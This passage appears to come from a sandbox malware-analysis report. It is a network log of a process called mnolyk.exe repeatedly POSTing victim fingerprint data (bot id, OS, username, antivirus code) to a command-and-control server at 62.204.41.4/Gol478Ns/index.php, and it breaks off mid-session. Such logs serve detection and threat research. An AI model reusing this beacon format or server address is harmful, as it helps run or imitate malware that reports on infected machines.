                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      193 | 192.168.2.7 | 49919 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:50.383743048 CET | 639 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:50.448525906 CET | 639 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      194 | 192.168.2.7 | 49920 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:50.617007971 CET | 640 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:50.679874897 CET | 640 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      195 | 192.168.2.7 | 49921 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:50.850421906 CET | 641 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:50.914513111 CET | 641 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      196 | 192.168.2.7 | 49922 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:51.089880943 CET | 642 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:51.156610966 CET | 642 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      197 | 192.168.2.7 | 49923 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:51.342927933 CET | 643 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:51.409949064 CET | 643 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      198 | 192.168.2.7 | 49924 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:51.587444067 CET | 644 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:51.654720068 CET | 644 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      199 | 192.168.2.7 | 49925 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:52.126735926 CET | 645 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:52.192497969 CET | 645 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      2 | 192.168.2.7 | 49726 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:35:56.260662079 CET | 365 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:35:56.327101946 CET | 380 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:35:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      20 | 192.168.2.7 | 49744 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:02.475153923 CET | 452 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:02.539536953 CET | 452 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      200 | 192.168.2.7 | 49926 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:52.489078999 CET | 646 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:52.560206890 CET | 646 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      201 | 192.168.2.7 | 49927 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:52.819700956 CET | 647 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:52.885586023 CET | 647 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      202 | 192.168.2.7 | 49928 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:53.692434072 CET | 648 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:53.756938934 CET | 648 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      203 | 192.168.2.7 | 49929 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:54.008802891 CET | 649 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:54.074717999 CET | 649 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      204 | 192.168.2.7 | 49930 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:55.312009096 CET | 650 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:55.375792027 CET | 651 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      205 | 192.168.2.7 | 49932 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:55.578352928 CET | 658 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:55.641483068 CET | 658 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      206 | 192.168.2.7 | 49933 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:55.825768948 CET | 659 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:55.889779091 CET | 659 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      207 | 192.168.2.7 | 49934 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:56.059242010 CET | 660 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:56.125365019 CET | 660 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      208 | 192.168.2.7 | 49935 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:56.304075003 CET | 661 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:56.367465019 CET | 661 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      209 | 192.168.2.7 | 49936 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:56.541075945 CET | 662 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
